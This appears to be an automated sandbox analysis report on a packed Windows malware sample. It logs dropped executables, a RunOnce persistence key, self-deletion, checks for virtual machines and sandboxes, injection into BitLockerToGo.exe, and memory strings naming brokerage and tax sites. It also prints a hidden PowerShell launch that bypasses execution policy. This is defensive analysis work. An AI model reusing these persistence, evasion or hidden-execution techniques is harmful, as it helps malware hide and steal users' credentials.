Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wbemcomn.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: amsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: userenv.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: version.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
Source: C:\Users\user\AppData\Roaming\sashibt Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: BitLockerToGo.pdb source: 7C81.exe, 0000000A.00000003.2938083888.0000022AE3FC0000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000003.2937937512.0000022AE4000000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956327407.000000C000480000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000966000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: 7C81.exe, 0000000A.00000003.2938083888.0000022AE3FC0000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000003.2937937512.0000022AE4000000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956327407.000000C000480000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000966000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.zowiz:R;.jovusaj:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\sashibt Unpacked PE file: 4.2.sashibt.400000.0.unpack .text:ER;.rdata:R;.data:W;.zowiz:R;.jovusaj:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\sashibt Unpacked PE file: 7.2.sashibt.400000.0.unpack .text:ER;.rdata:R;.data:W;.zowiz:R;.jovusaj:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: file.exe Static PE information: section name: .zowiz
Source: file.exe Static PE information: section name: .jovusaj
Source: 7C81.exe.2.dr Static PE information: section name: .xdata
Source: sashibt.2.dr Static PE information: section name: .zowiz
Source: sashibt.2.dr Static PE information: section name: .jovusaj
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403230 push eax; ret 0_2_00403302
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004026FF push ecx; ret 0_2_0040270B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0255168F push esi; retf 0_2_025516BC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02552766 push ecx; ret 0_2_02552772
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0271525B push edi; retf 0_2_02715266
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02715640 push ss; retf 0_2_02715612
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02715221 push edi; retf 0_2_02715266
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_027155FF push ss; retf 0_2_02715612
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_027169C7 pushad ; retf 0_2_02716A40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_027169A8 pushad ; retf 0_2_02716A40
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_00403230 push eax; ret 4_2_00403302
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_004026FF push ecx; ret 4_2_0040270B
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_025E168F push esi; retf 4_2_025E16BC
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_025E2766 push ecx; ret 4_2_025E2772
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_0264506B push edi; retf 4_2_02645076
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_02645450 push ss; retf 4_2_02645422
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_02645031 push edi; retf 4_2_02645076
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_0264540F push ss; retf 4_2_02645422
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_026467D7 pushad ; retf 4_2_02646850
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_0263D7AC pushad ; retf 4_2_0263D7AD
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 4_2_026467B8 pushad ; retf 4_2_02646850
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_00403230 push eax; ret 7_2_00403302
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_004026FF push ecx; ret 7_2_0040270B
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_025E168F push esi; retf 7_2_025E16BC
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_025E2766 push ecx; ret 7_2_025E2772
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_0266996F pushad ; retf 7_2_026699E8
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_02669950 pushad ; retf 7_2_026699E8
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_02668203 push edi; retf 7_2_0266820E
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_026685E8 push ss; retf 7_2_026685BA
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_026681C9 push edi; retf 7_2_0266820E
Source: C:\Users\user\AppData\Roaming\sashibt Code function: 7_2_026685A7 push ss; retf 7_2_026685BA
Source: file.exe Static PE information: section name: .text entropy: 7.7772612824669265
Source: sashibt.2.dr Static PE information: section name: .text entropy: 7.7772612824669265
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\sashibt
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\7C81.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\6E8A.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3530.exe

Boot Survival

Source: C:\Windows\explorer.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#7936_8yUscnjrUY

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\sashibt:Zone.Identifier read attributes | delete
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7C81.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (identical event repeated 77 times in the report)

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\3530.exe File Queried: C:\INTERNAL\__empty Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior (identical event repeated 6 times in the report)
Source: C:\Users\user\AppData\Roaming\sashibt Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior (identical event repeated 12 times in the report)
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\Desktop\file.exe API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Roaming\sashibt API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Roaming\sashibt API/Special instruction interceptor: Address: 7FF8C88ED584
Source: sashibt, 00000007.00000002.2706655309.0000000002657000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Memory allocated: 21F85D80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Memory allocated: 21F9F820000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Memory allocated: 21FA3150000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Memory allocated: 2598CDA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Memory allocated: 259A6780000 memory reserve | memory write watch
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxSF.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\vmnet.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\vmmouse.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\vboxtray.exe Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\vboxhook.dll Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxGuest.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxVideo.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\vmci.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\drivers\VBoxMouse.sys Jump to behavior
Source: C:\Windows\explorer.exe File opened / queried: C:\Windows\System32\vboxservice.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Code function: 11_2_00007FF849010E55 sidt fword ptr [ecx-08h] 11_2_00007FF849010E55
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 597937
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 594906
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 478 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1265 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 704 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1858 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 887 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 864 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe Window / User API: threadDelayed 1044 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9561
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 367
Source: C:\Windows\explorer.exe TID: 3288 Thread sleep time: -126500s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6568 Thread sleep time: -70400s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 3288 Thread sleep time: -185800s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe TID: 3560 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe TID: 3560 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe TID: 5804 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 2952 Thread sleep time: -210000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6536 Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6536 Thread sleep time: -597937s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6536 Thread sleep time: -594906s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (identical event repeated 4 times in the report)
Source: C:\Users\user\AppData\Local\Temp\3530.exe Code function: 8_2_00007FF7A09A7000 GetKeyboardLayoutList followed by cmp: cmp r8d, 00000419h and CTI: je 00007FF7A09A71AFh 8_2_00007FF7A09A7000
Source: explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2078086633.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: BitLockerToGo.exe, 0000000E.00000003.3002238333.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: 7C81.exe.2.dr Binary or memory string: runtime: sp=abi mismatchout of rangeCypro_MinoanMeetei_MayekPahawh_HmongSora_SompengSyloti_Nagrimultipathtcp127.0.0.1:53no such hostCIDR addressunknown portinvalid portgetaddrinfowtransmitfileGetConsoleCPnot pollableECDSA-SHA256ECDSA-SHA384ECDSA-SHA512SERIALNUMBERstringlengthContent-Typecontext.TODOtlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap traffichttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2100-continueMulti-StatusNot ModifiedUnauthorizedI'm a teapotNot ExtendedproxyconnectMime-VersionX-ImforwardsX-Powered-Bybad Tc valuebad Th valuebad Tq valuebad Pq valuebad Td valuebad Ta valuedisplay-nameban-durationRemoveSignerGetDealLabelChangePeerIDTransferFromgotypesaliasRCodeSuccessRCodeRefusedinvalid baseInstAltMatchunexpected )altmatch -> anynotnl -> empty numberReadObjectCBdecode arraydecode sliceunknown type = struct { Content Type (sensitive)simple errordbl-sha2-256base32hexpadbase58flickrbase64urlpadbase256emojiavx5124fmapsavx512bitalgcaller errorPskModePlaineccsi_sha256PUNSUBSCRIBESUNSUBSCRIBE(database)s$Switch Proxy.fasthttp.gz.fasthttp.brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunctionCalluncompressedparsing time out of rangeDeleteServiceRegEnumKeyExWRegOpenKeyExWStartServiceWCertOpenStoreFindNextFileWFindResourceWGetDriveTypeWMapViewOfFileModule32NextWThread32FirstVirtualUnlockWaitCommEventWriteConsoleWRtlGetVersionRtlInitStringCoTaskMemFreeEnumProcessesShellExecuteWExitWindowsExGetClassNameWtimeEndPeriodFreeAddrInfoWgethostbynamegetservbynameWTSFreeMemoryFindFirstFileWSACloseEventgethostbyaddrgetservbyportWSAResetEventWSAIsBlockingSysFreeStringSafeArrayLockSafeArrayCopyVarI2FromDateVarI2FromDispVarI2FromBoolVarI4FromDateVarI4FromDispVarI4FromBoolVarR4FromDateVarR4FromDispVarR4FromBoolVarR8FromDateVarR8FromDispVarR8FromBoolVarDateFromI2VarDateFromI4VarDateFromR4VarDateFromR8VarDateFromCyVarCyFromDateVarCyFromDispVarCyFromBoolVarBstrFromI2VarBstrFromI4VarBstrFromR4VarBstrFromR8VarBstrFromCyVarBoolFromI2VarBoolFromI4VarBoolFromR4VarBoolFromR8VarBoolFromCyVarUI1FromStrCreateTypeLibClearCustDataLoadTypeLibExVarDecFromUI1VarDecFromStrVarDateFromI1VarBstrFromI1VarBoolFromI1VarUI1FromUI2VarUI1FromUI4VarUI1FromDecVarDecFromUI2VarDecFromUI4VarI1FromDateVarI1FromDispVarI1FromBoolVarUI2FromUI1VarUI2FromStrVarUI2FromUI4VarUI2FromDecVarUI4FromUI1VarUI4FromStrVarUI4FromUI2VarUI4FromDecBSTR_UserSizeBSTR_UserFreeVarI8FromDateVarI8FromDispVarI8FromBoolVarDateFromI8VarBstrFromI8VarBoolFromI8VarUI1FromUI8VarDecFromUI8VarUI2FromUI8VarUI4FromUI8VarUI8FromUI1VarUI8FromStrVarUI8FromUI2VarUI8FromUI4VarUI8FromDecOMAP From SrcInterfaceImplStandAloneSigAssemblyRefOSEFI byte codeMIPS with FPUEFI ROM imageAlign 2-BytesAlign 4-BytesAlign 8-Bytesby_start_timeDRAINING_SUBSDRAINING_PU
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 7C81.exe, 0000000A.00000002.2957905311.0000022ADE938000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW;s
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2080080282.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: BitLockerToGo.exe, 0000000E.00000003.3002238333.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000002.00000000.2079158771.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
